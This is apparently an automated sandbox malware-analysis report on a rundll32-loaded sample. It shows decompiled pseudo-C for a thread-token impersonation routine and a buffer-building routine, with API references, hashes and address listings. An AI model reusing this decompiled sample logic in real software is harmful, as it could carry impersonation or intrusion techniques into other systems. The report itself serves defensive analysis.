                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,007B7B43,?,?,00000004,007B787C,00000000,000000FF), ref: 007BA402
                                                                                                                                                                                        • SetLastError.KERNEL32(00000057,?,?,007B7B43,?,?,00000004,007B787C,00000000,000000FF), ref: 007BA411
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Thread$ErrorLast$CloseCreateHandleResumeToken
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2435877492-0
                                                                                                                                                                                        • Opcode ID: bcde19e9d168ba2367e85a59897cdd36337a036ae109f26920e7f27865eac505
                                                                                                                                                                                        • Instruction ID: 17979c6da990e10fbbd859f75b98aa3da342b2c8c1036559f9559b6217ded089
                                                                                                                                                                                        • Opcode Fuzzy Hash: bcde19e9d168ba2367e85a59897cdd36337a036ae109f26920e7f27865eac505
                                                                                                                                                                                        • Instruction Fuzzy Hash: 74018F30501119FBCB30AB65ED0DEDE7E78EB85774B204121F505D2150E7B88E41EAA5
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B796E(void* __ecx, void* _a4) {
                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                        				void _v12;
                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                        				_t12 = CreateThread(0, 0, E007B7957,  &_v12, 4, 0);
                                                                                                                                                                                        				_v8 = _t12;
                                                                                                                                                                                        				if(_t12 != 0) {
                                                                                                                                                                                        					if(SetThreadToken( &_v8, _a4) != 0) {
                                                                                                                                                                                        						if(ResumeThread(_v8) == 0xffffffff) {
                                                                                                                                                                                        							GetLastError();
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							WaitForSingleObject(_v8, 0xffffffff);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					CloseHandle(_v8);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v12;
                                                                                                                                                                                        			}







                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 007B7988
                                                                                                                                                                                        • SetThreadToken.ADVAPI32(?,00000000,?,?,?,007B7B4A,?,?,?,00000004,007B787C,00000000,000000FF), ref: 007B799C
                                                                                                                                                                                        • ResumeThread.KERNEL32(?,?,?,?,007B7B4A,?,?,?,00000004,007B787C,00000000,000000FF), ref: 007B79A9
                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,007B7B4A,?,?,?,00000004,007B787C,00000000,000000FF), ref: 007B79B9
                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,007B7B4A,?,?,?,00000004,007B787C,00000000,000000FF), ref: 007B79C1
                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,007B7B4A,?,?,?,00000004,007B787C,00000000,000000FF), ref: 007B79CA
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Thread$CloseCreateErrorHandleLastObjectResumeSingleTokenWait
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1168161173-0
                                                                                                                                                                                        • Opcode ID: 004ff342218fdd6cdfceb3a52d41d8204f3a51b1b7644749e802be64b399ad7a
                                                                                                                                                                                        • Instruction ID: afbc07415132512f5b9b8fe1812ecc66d8ba350784b52a56bccff97a238283b0
                                                                                                                                                                                        • Opcode Fuzzy Hash: 004ff342218fdd6cdfceb3a52d41d8204f3a51b1b7644749e802be64b399ad7a
                                                                                                                                                                                        • Instruction Fuzzy Hash: C8F0C47054420AFBDF249BA4DD4AF9D7B78AB44725F204250B611E10E0E7B8EE45DA18
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B4B5D(intOrPtr* __eax, void* _a4, signed char _a7, intOrPtr* _a8, signed int* _a12, signed short* _a16) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                        				intOrPtr* _t120;
                                                                                                                                                                                        				intOrPtr* _t122;
                                                                                                                                                                                        				intOrPtr* _t124;
                                                                                                                                                                                        				intOrPtr* _t126;
                                                                                                                                                                                        				intOrPtr* _t128;
                                                                                                                                                                                        				intOrPtr* _t130;
                                                                                                                                                                                        				signed short _t136;
                                                                                                                                                                                        				void* _t139;
                                                                                                                                                                                        				void* _t141;
                                                                                                                                                                                        				signed char _t143;
                                                                                                                                                                                        				signed short _t145;
                                                                                                                                                                                        				intOrPtr* _t147;
                                                                                                                                                                                        				intOrPtr* _t150;
                                                                                                                                                                                        				intOrPtr* _t153;
                                                                                                                                                                                        				signed char _t156;
                                                                                                                                                                                        				intOrPtr* _t160;
                                                                                                                                                                                        				intOrPtr* _t163;
                                                                                                                                                                                        				intOrPtr* _t166;
                                                                                                                                                                                        				signed char _t169;
                                                                                                                                                                                        				signed short _t171;
                                                                                                                                                                                        				intOrPtr* _t176;
                                                                                                                                                                                        				intOrPtr* _t182;
                                                                                                                                                                                        				intOrPtr* _t187;
                                                                                                                                                                                        				signed char _t188;
                                                                                                                                                                                        				intOrPtr _t189;
                                                                                                                                                                                        				intOrPtr _t190;
                                                                                                                                                                                        				intOrPtr _t191;
                                                                                                                                                                                        				intOrPtr _t192;
                                                                                                                                                                                        				intOrPtr _t193;
                                                                                                                                                                                        				intOrPtr _t194;
                                                                                                                                                                                        				short _t202;
                                                                                                                                                                                        				signed int _t203;
                                                                                                                                                                                        				intOrPtr* _t205;
                                                                                                                                                                                        				intOrPtr* _t208;
                                                                                                                                                                                        				intOrPtr* _t211;
                                                                                                                                                                                        				intOrPtr _t214;
                                                                                                                                                                                        				intOrPtr _t216;
                                                                                                                                                                                        				intOrPtr _t218;
                                                                                                                                                                                        				intOrPtr _t219;
                                                                                                                                                                                        				intOrPtr _t221;
                                                                                                                                                                                        				intOrPtr _t223;
                                                                                                                                                                                        				signed int _t225;
                                                                                                                                                                                        				intOrPtr _t227;
                                                                                                                                                                                        				signed int _t228;
                                                                                                                                                                                        				intOrPtr _t230;
                                                                                                                                                                                        				intOrPtr* _t232;
                                                                                                                                                                                        				void* _t234;
                                                                                                                                                                                        				intOrPtr _t236;
                                                                                                                                                                                        				signed char _t237;
                                                                                                                                                                                        				intOrPtr _t238;
                                                                                                                                                                                        				signed char _t239;
                                                                                                                                                                                        				intOrPtr* _t240;
                                                                                                                                                                                        				signed int _t241;
                                                                                                                                                                                        				intOrPtr _t243;
                                                                                                                                                                                        				void* _t245;
                                                                                                                                                                                        				void* _t252;
                                                                                                                                                                                        				void* _t256;
                                                                                                                                                                                        				void* _t257;
                                                                                                                                                                                        				void* _t258;
                                                                                                                                                                                        				void* _t259;
                                                                                                                                                                                        				void* _t260;
                                                                                                                                                                                        				void* _t261;
                                                                                                                                                                                        				void* _t262;
                                                                                                                                                                                        				void* _t263;
                                                                                                                                                                                        				void* _t265;
                                                                                                                                                                                        				void* _t266;
                                                                                                                                                                                        				void* _t267;
                                                                                                                                                                                        				void* _t268;
                                                                                                                                                                                        				void* _t269;
                                                                                                                                                                                        				void* _t270;
                                                                                                                                                                                        				signed int _t276;
                                                                                                                                                                                        				void* _t278;
                                                                                                                                                                                        				void* _t279;
                                                                                                                                                                                        				void* _t280;
                                                                                                                                                                                        				signed int _t281;
                                                                                                                                                                                        				void* _t282;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t187 = __eax;
                                                                                                                                                                                        				 *_a12 =  *_a12 & 0x00000000;
                                                                                                                                                                                        				_t120 = __eax;
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_t3 = _t120 + 1; // 0x1
                                                                                                                                                                                        				_t265 = _t3;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t189 =  *_t120;
                                                                                                                                                                                        					_t120 = _t120 + 1;
                                                                                                                                                                                        				} while (_t189 != 0);
                                                                                                                                                                                        				_v12 = _t120 - _t265;
                                                                                                                                                                                        				_t122 = __eax;
                                                                                                                                                                                        				_t5 = _t122 + 1; // 0x1
                                                                                                                                                                                        				_t266 = _t5;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t190 =  *_t122;
                                                                                                                                                                                        					_t122 = _t122 + 1;
                                                                                                                                                                                        				} while (_t190 != 0);
                                                                                                                                                                                        				_t245 = _t122 - _t266;
                                                                                                                                                                                        				_t124 = __eax;
                                                                                                                                                                                        				_t6 = _t124 + 1; // 0x1
                                                                                                                                                                                        				_t267 = _t6;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t191 =  *_t124;
                                                                                                                                                                                        					_t124 = _t124 + 1;
                                                                                                                                                                                        				} while (_t191 != 0);
                                                                                                                                                                                        				_v16 = _t124 - _t267;
                                                                                                                                                                                        				_t126 = __eax;
                                                                                                                                                                                        				_t8 = _t126 + 1; // 0x1
                                                                                                                                                                                        				_t268 = _t8;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t192 =  *_t126;
                                                                                                                                                                                        					_t126 = _t126 + 1;
                                                                                                                                                                                        				} while (_t192 != 0);
                                                                                                                                                                                        				_t234 = _t126 - _t268;
                                                                                                                                                                                        				_t128 = _a8;
                                                                                                                                                                                        				_t10 = _t128 + 1; // 0x1
                                                                                                                                                                                        				_t269 = _t10;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t193 =  *_t128;
                                                                                                                                                                                        					_t128 = _t128 + 1;
                                                                                                                                                                                        				} while (_t193 != 0);
                                                                                                                                                                                        				_v20 = _t128 - _t269;
                                                                                                                                                                                        				_t130 = _a8;
                                                                                                                                                                                        				_t13 = _t130 + 1; // 0x1
                                                                                                                                                                                        				_t270 = _t13;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t194 =  *_t130;
                                                                                                                                                                                        					_t130 = _t130 + 1;
                                                                                                                                                                                        				} while (_t194 != 0);
                                                                                                                                                                                        				_t20 = (_v12 + _v16 + _v20) * 2; // 0x10088
                                                                                                                                                                                        				_t136 = (0x0000fffe - _t245 + _t245 & 0x00000003) + (0x0000fffe - _t234 + _t234 & 0x00000003) + (0x0000fffe - _t130 - _t270 + _t130 - _t270 & 0x00000003) + _t20 + 0x8a;
                                                                                                                                                                                        				 *_a16 = _t136;
                                                                                                                                                                                        				_t139 = HeapAlloc(GetProcessHeap(), 8, _t136 & 0x0000ffff);
                                                                                                                                                                                        				 *_a12 = _t139;
                                                                                                                                                                                        				if(_t139 != 0) {
                                                                                                                                                                                        					_t276 = 0;
                                                                                                                                                                                        					_t252 = 0x18;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t23 = _t276 + 0x7c3730; // 0xfcfffffa
                                                                                                                                                                                        						 *(_t276 + _t139) =  !( *_t23);
                                                                                                                                                                                        						_t276 = _t276 + 1;
                                                                                                                                                                                        						_t252 = _t252 - 1;
                                                                                                                                                                                        					} while (_t252 != 0);
                                                                                                                                                                                        					_t202 = 0xc;
                                                                                                                                                                                        					 *(_t139 + 0xc) = 2;
                                                                                                                                                                                        					 *((short*)(_t139 + 0x16)) = _t202;
                                                                                                                                                                                        					_t28 = _t139 + 0x18; // 0x18
                                                                                                                                                                                        					_t203 = 5;
                                                                                                                                                                                        					_t141 = memcpy(_t28, _a4, _t203 << 2);
                                                                                                                                                                                        					_t205 = _t187;
                                                                                                                                                                                        					_t30 = _t205 + 1; // 0x1
                                                                                                                                                                                        					_t278 = _t30;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t236 =  *_t205;
                                                                                                                                                                                        						_t205 = _t205 + 1;
                                                                                                                                                                                        					} while (_t236 != 0);
                                                                                                                                                                                        					 *((intOrPtr*)(_t141 + 0x2c)) = _t205 - _t278 + 1;
                                                                                                                                                                                        					_t208 = _t187;
                                                                                                                                                                                        					_t32 = _t208 + 1; // 0x1
                                                                                                                                                                                        					_t279 = _t32;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t237 =  *_t208;
                                                                                                                                                                                        						_t208 = _t208 + 1;
                                                                                                                                                                                        					} while (_t237 != 0);
                                                                                                                                                                                        					 *((intOrPtr*)(_t141 + 0x34)) = _t208 - _t279 + 1;
                                                                                                                                                                                        					_t211 = _t187;
                                                                                                                                                                                        					_v12 = 0x38;
                                                                                                                                                                                        					_a7 = _t237;
                                                                                                                                                                                        					_t36 = _t211 + 1; // 0x1
                                                                                                                                                                                        					_t280 = _t36;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t238 =  *_t211;
                                                                                                                                                                                        						_t211 = _t211 + 1;
                                                                                                                                                                                        					} while (_t238 != 0);
                                                                                                                                                                                        					if(_t211 != _t280) {
                                                                                                                                                                                        						_t241 = 0;
                                                                                                                                                                                        						do {
                                                                                                                                                                                        							_v12 = _v12 + 2;
                                                                                                                                                                                        							_a7 = _a7 + 1;
                                                                                                                                                                                        							 *((char*)(_t141 + (_v12 & 0x0000ffff))) =  *((intOrPtr*)(_t241 + _t187));
                                                                                                                                                                                        							_t232 = _t187;
                                                                                                                                                                                        							_t44 = _t232 + 1; // 0x1
                                                                                                                                                                                        							_t282 = _t44;
                                                                                                                                                                                        							do {
                                                                                                                                                                                        								_t243 =  *_t232;
                                                                                                                                                                                        								_t232 = _t232 + 1;
                                                                                                                                                                                        							} while (_t243 != 0);
                                                                                                                                                                                        							_t241 = _a7 & 0x000000ff;
                                                                                                                                                                                        						} while (_t241 < _t232 - _t282);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_v12 = _v12 + 2;
                                                                                                                                                                                        					_t143 = _v12 & 3;
                                                                                                                                                                                        					if(_t143 < 0) {
                                                                                                                                                                                        						_t143 = (_t143 - 0x00000001 | 0xfffffffc) + 1;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					if(_t143 != 0) {
                                                                                                                                                                                        						_v12 = _v12 + (_t143 & 0x000000ff);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t281 =  *_a12;
                                                                                                                                                                                        					_t145 = rand();
                                                                                                                                                                                        					_v12 = _v12 + 4;
                                                                                                                                                                                        					 *((_v12 & 0x0000ffff) + _t281) = _t145 & 0x0000ffff;
                                                                                                                                                                                        					_t147 = _t187;
                                                                                                                                                                                        					_t56 = _t147 + 1; // 0x1
                                                                                                                                                                                        					_t256 = _t56;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t214 =  *_t147;
                                                                                                                                                                                        						_t147 = _t147 + 1;
                                                                                                                                                                                        					} while (_t214 != 0);
                                                                                                                                                                                        					_v12 = _v12 + 8;
                                                                                                                                                                                        					 *((_v12 & 0x0000ffff) + _t281) = _t147 - _t256 + 1;
                                                                                                                                                                                        					_t150 = _t187;
                                                                                                                                                                                        					_t61 = _t150 + 1; // 0x1
                                                                                                                                                                                        					_t257 = _t61;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t216 =  *_t150;
                                                                                                                                                                                        						_t150 = _t150 + 1;
                                                                                                                                                                                        					} while (_t216 != 0);
                                                                                                                                                                                        					_v12 = _v12 + 4;
                                                                                                                                                                                        					 *((_v12 & 0x0000ffff) + _t281) = _t150 - _t257 + 1;
                                                                                                                                                                                        					_t153 = _t187;
                                                                                                                                                                                        					_t239 = 0;
                                                                                                                                                                                        					_t66 = _t153 + 1; // 0x1
                                                                                                                                                                                        					_t258 = _t66;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t218 =  *_t153;
                                                                                                                                                                                        						_t153 = _t153 + 1;
                                                                                                                                                                                        					} while (_t218 != 0);
                                                                                                                                                                                        					if(_t153 != _t258) {
                                                                                                                                                                                        						_t228 = 0;
                                                                                                                                                                                        						do {
                                                                                                                                                                                        							_v12 = _v12 + 2;
                                                                                                                                                                                        							 *((_v12 & 0x0000ffff) + _t281) =  *((intOrPtr*)(_t228 + _t187));
                                                                                                                                                                                        							_t182 = _t187;
                                                                                                                                                                                        							_t239 = _t239 + 1;
                                                                                                                                                                                        							_t72 = _t182 + 1; // 0x1
                                                                                                                                                                                        							_t263 = _t72;
                                                                                                                                                                                        							do {
                                                                                                                                                                                        								_t230 =  *_t182;
                                                                                                                                                                                        								_t182 = _t182 + 1;
                                                                                                                                                                                        							} while (_t230 != 0);
                                                                                                                                                                                        							_t228 = _t239 & 0x000000ff;
                                                                                                                                                                                        						} while (_t228 < _t182 - _t263);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_v12 = _v12 + 2;
                                                                                                                                                                                        					_t156 = _v12 & 3;
                                                                                                                                                                                        					if(_t156 < 0) {
                                                                                                                                                                                        						_t156 = (_t156 - 0x00000001 | 0xfffffffc) + 1;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					if(_t156 != 0) {
                                                                                                                                                                                        						_v12 = _v12 + (_t156 & 0x000000ff);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_v12 = _v12 + 4;
                                                                                                                                                                                        					_t240 = _a8;
                                                                                                                                                                                        					 *((_v12 & 0x0000ffff) + _t281) = 0xf01ff;
                                                                                                                                                                                        					_v12 = _v12 + 4;
                                                                                                                                                                                        					 *((_v12 & 0x0000ffff) + _t281) = 0x10;
                                                                                                                                                                                        					_v12 = _v12 + 8;
                                                                                                                                                                                        					 *((_v12 & 0x0000ffff) + _t281) = 2;
                                                                                                                                                                                        					_t160 = _t240;
                                                                                                                                                                                        					_t259 = _t160 + 1;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t219 =  *_t160;
                                                                                                                                                                                        						_t160 = _t160 + 1;
                                                                                                                                                                                        					} while (_t219 != 0);
                                                                                                                                                                                        					_v12 = _v12 + 8;
                                                                                                                                                                                        					 *((_v12 & 0x0000ffff) + _t281) = _t160 - _t259 + 1;
                                                                                                                                                                                        					_t163 = _t240;
                                                                                                                                                                                        					_t260 = _t163 + 1;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t221 =  *_t163;
                                                                                                                                                                                        						_t163 = _t163 + 1;
                                                                                                                                                                                        					} while (_t221 != 0);
                                                                                                                                                                                        					_v12 = _v12 + 4;
                                                                                                                                                                                        					 *((_v12 & 0x0000ffff) + _t281) = _t163 - _t260 + 1;
                                                                                                                                                                                        					_t166 = _t240;
                                                                                                                                                                                        					_t188 = 0;
                                                                                                                                                                                        					_t261 = _t166 + 1;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t223 =  *_t166;
                                                                                                                                                                                        						_t166 = _t166 + 1;
                                                                                                                                                                                        					} while (_t223 != 0);
                                                                                                                                                                                        					if(_t166 != _t261) {
                                                                                                                                                                                        						_t225 = 0;
                                                                                                                                                                                        						do {
                                                                                                                                                                                        							_v12 = _v12 + 2;
                                                                                                                                                                                        							 *((_v12 & 0x0000ffff) + _t281) =  *((intOrPtr*)(_t225 + _t240));
                                                                                                                                                                                        							_t176 = _t240;
                                                                                                                                                                                        							_t188 = _t188 + 1;
                                                                                                                                                                                        							_t262 = _t176 + 1;
                                                                                                                                                                                        							do {
                                                                                                                                                                                        								_t227 =  *_t176;
                                                                                                                                                                                        								_t176 = _t176 + 1;
                                                                                                                                                                                        							} while (_t227 != 0);
                                                                                                                                                                                        							_t225 = _t188 & 0x000000ff;
                                                                                                                                                                                        						} while (_t225 < _t176 - _t262);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_v12 = _v12 + 2;
                                                                                                                                                                                        					_t169 = _v12 & 3;
                                                                                                                                                                                        					if(_t169 < 0) {
                                                                                                                                                                                        						_t169 = (_t169 - 0x00000001 | 0xfffffffc) + 1;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					if(_t169 != 0) {
                                                                                                                                                                                        						_v12 = _v12 + (_t169 & 0x000000ff);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t171 = _v12 + 0x1c;
                                                                                                                                                                                        					 *_a16 = _t171;
                                                                                                                                                                                        					 *(_t281 + 8) = _t171;
                                                                                                                                                                                        					_v5 = 1;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                        			}



















































































                                                                                                                                                                                        0x007b4c74
                                                                                                                                                                                        0x007b4c75
                                                                                                                                                                                        0x007b4c7c
                                                                                                                                                                                        0x007b4c7f
                                                                                                                                                                                        0x007b4c81
                                                                                                                                                                                        0x007b4c88
                                                                                                                                                                                        0x007b4c8b
                                                                                                                                                                                        0x007b4c8b
                                                                                                                                                                                        0x007b4c8e
                                                                                                                                                                                        0x007b4c8e
                                                                                                                                                                                        0x007b4c90
                                                                                                                                                                                        0x007b4c91
                                                                                                                                                                                        0x007b4c97
                                                                                                                                                                                        0x007b4c99
                                                                                                                                                                                        0x007b4c9b
                                                                                                                                                                                        0x007b4ca2
                                                                                                                                                                                        0x007b4ca6
                                                                                                                                                                                        0x007b4ca9
                                                                                                                                                                                        0x007b4cac
                                                                                                                                                                                        0x007b4cae
                                                                                                                                                                                        0x007b4cae
                                                                                                                                                                                        0x007b4cb1
                                                                                                                                                                                        0x007b4cb1
                                                                                                                                                                                        0x007b4cb3
                                                                                                                                                                                        0x007b4cb4
                                                                                                                                                                                        0x007b4cb8
                                                                                                                                                                                        0x007b4cbe
                                                                                                                                                                                        0x007b4c9b
                                                                                                                                                                                        0x007b4cc2
                                                                                                                                                                                        0x007b4cca
                                                                                                                                                                                        0x007b4ccf
                                                                                                                                                                                        0x007b4cd5
                                                                                                                                                                                        0x007b4cd5
                                                                                                                                                                                        0x007b4cd8
                                                                                                                                                                                        0x007b4cdd
                                                                                                                                                                                        0x007b4cdd
                                                                                                                                                                                        0x007b4ce4
                                                                                                                                                                                        0x007b4ce6
                                                                                                                                                                                        0x007b4cf0
                                                                                                                                                                                        0x007b4cf7
                                                                                                                                                                                        0x007b4cfa
                                                                                                                                                                                        0x007b4cfc
                                                                                                                                                                                        0x007b4cfc
                                                                                                                                                                                        0x007b4cff
                                                                                                                                                                                        0x007b4cff
                                                                                                                                                                                        0x007b4d01
                                                                                                                                                                                        0x007b4d02
                                                                                                                                                                                        0x007b4d0d
                                                                                                                                                                                        0x007b4d11
                                                                                                                                                                                        0x007b4d14
                                                                                                                                                                                        0x007b4d16
                                                                                                                                                                                        0x007b4d16
                                                                                                                                                                                        0x007b4d19
                                                                                                                                                                                        0x007b4d19
                                                                                                                                                                                        0x007b4d1b
                                                                                                                                                                                        0x007b4d1c
                                                                                                                                                                                        0x007b4d24
                                                                                                                                                                                        0x007b4d2b
                                                                                                                                                                                        0x007b4d2e
                                                                                                                                                                                        0x007b4d30
                                                                                                                                                                                        0x007b4d32
                                                                                                                                                                                        0x007b4d32
                                                                                                                                                                                        0x007b4d35
                                                                                                                                                                                        0x007b4d35
                                                                                                                                                                                        0x007b4d37
                                                                                                                                                                                        0x007b4d38
                                                                                                                                                                                        0x007b4d3e
                                                                                                                                                                                        0x007b4d40
                                                                                                                                                                                        0x007b4d42
                                                                                                                                                                                        0x007b4d49
                                                                                                                                                                                        0x007b4d4d
                                                                                                                                                                                        0x007b4d50
                                                                                                                                                                                        0x007b4d52
                                                                                                                                                                                        0x007b4d54
                                                                                                                                                                                        0x007b4d54
                                                                                                                                                                                        0x007b4d57
                                                                                                                                                                                        0x007b4d57
                                                                                                                                                                                        0x007b4d59
                                                                                                                                                                                        0x007b4d5a
                                                                                                                                                                                        0x007b4d5e
                                                                                                                                                                                        0x007b4d63
                                                                                                                                                                                        0x007b4d42
                                                                                                                                                                                        0x007b4d67
                                                                                                                                                                                        0x007b4d6f
                                                                                                                                                                                        0x007b4d74
                                                                                                                                                                                        0x007b4d7a
                                                                                                                                                                                        0x007b4d7a
                                                                                                                                                                                        0x007b4d7d
                                                                                                                                                                                        0x007b4d82
                                                                                                                                                                                        0x007b4d82
                                                                                                                                                                                        0x007b4d8a
                                                                                                                                                                                        0x007b4d8e
                                                                                                                                                                                        0x007b4d91
                                                                                                                                                                                        0x007b4d9c
                                                                                                                                                                                        0x007b4da0
                                                                                                                                                                                        0x007b4dab
                                                                                                                                                                                        0x007b4daf
                                                                                                                                                                                        0x007b4db6
                                                                                                                                                                                        0x007b4db8
                                                                                                                                                                                        0x007b4dbb
                                                                                                                                                                                        0x007b4dbb
                                                                                                                                                                                        0x007b4dbd
                                                                                                                                                                                        0x007b4dbe
                                                                                                                                                                                        0x007b4dc9
                                                                                                                                                                                        0x007b4dcd
                                                                                                                                                                                        0x007b4dd0
                                                                                                                                                                                        0x007b4dd2
                                                                                                                                                                                        0x007b4dd5
                                                                                                                                                                                        0x007b4dd5
                                                                                                                                                                                        0x007b4dd7
                                                                                                                                                                                        0x007b4dd8
                                                                                                                                                                                        0x007b4de0
                                                                                                                                                                                        0x007b4de7
                                                                                                                                                                                        0x007b4dea
                                                                                                                                                                                        0x007b4dec
                                                                                                                                                                                        0x007b4dee
                                                                                                                                                                                        0x007b4df1
                                                                                                                                                                                        0x007b4df1
                                                                                                                                                                                        0x007b4df3
                                                                                                                                                                                        0x007b4df4
                                                                                                                                                                                        0x007b4dfa
                                                                                                                                                                                        0x007b4dfc
                                                                                                                                                                                        0x007b4dfe
                                                                                                                                                                                        0x007b4e05
                                                                                                                                                                                        0x007b4e09
                                                                                                                                                                                        0x007b4e0c
                                                                                                                                                                                        0x007b4e0e
                                                                                                                                                                                        0x007b4e10
                                                                                                                                                                                        0x007b4e13
                                                                                                                                                                                        0x007b4e13
                                                                                                                                                                                        0x007b4e15
                                                                                                                                                                                        0x007b4e16
                                                                                                                                                                                        0x007b4e1a
                                                                                                                                                                                        0x007b4e1f
                                                                                                                                                                                        0x007b4dfe
                                                                                                                                                                                        0x007b4e23
                                                                                                                                                                                        0x007b4e2b
                                                                                                                                                                                        0x007b4e30
                                                                                                                                                                                        0x007b4e36
                                                                                                                                                                                        0x007b4e36
                                                                                                                                                                                        0x007b4e39
                                                                                                                                                                                        0x007b4e3e
                                                                                                                                                                                        0x007b4e3e
                                                                                                                                                                                        0x007b4e48
                                                                                                                                                                                        0x007b4e4b
                                                                                                                                                                                        0x007b4e4e
                                                                                                                                                                                        0x007b4e52
                                                                                                                                                                                        0x007b4e52
                                                                                                                                                                                        0x007b4e5d

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,74654F20,77794DB0,00000000,?,00000000,00000000,00000000), ref: 007B4C14
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B4C1B
                                                                                                                                                                                        • rand.MSVCRT ref: 007B4CE6
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$AllocProcessrand
                                                                                                                                                                                        • String ID: Oet Uet0Xet$8
                                                                                                                                                                                        • API String ID: 1878709018-91176900
                                                                                                                                                                                        • Opcode ID: 739e1b83f532f091fc823c7ff8593941e107e32fb8742ec14401e964aac6dbc3
                                                                                                                                                                                        • Instruction ID: a972ed056375da965b0cf0a47034fd96dc13ede52f146d44c780c321c190cf2f
                                                                                                                                                                                        • Opcode Fuzzy Hash: 739e1b83f532f091fc823c7ff8593941e107e32fb8742ec14401e964aac6dbc3
                                                                                                                                                                                        • Instruction Fuzzy Hash: B1B11631A042669FCB168F6C84643F97FF1EF06318F2581D9E8C5EB252DA39D94AC750
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

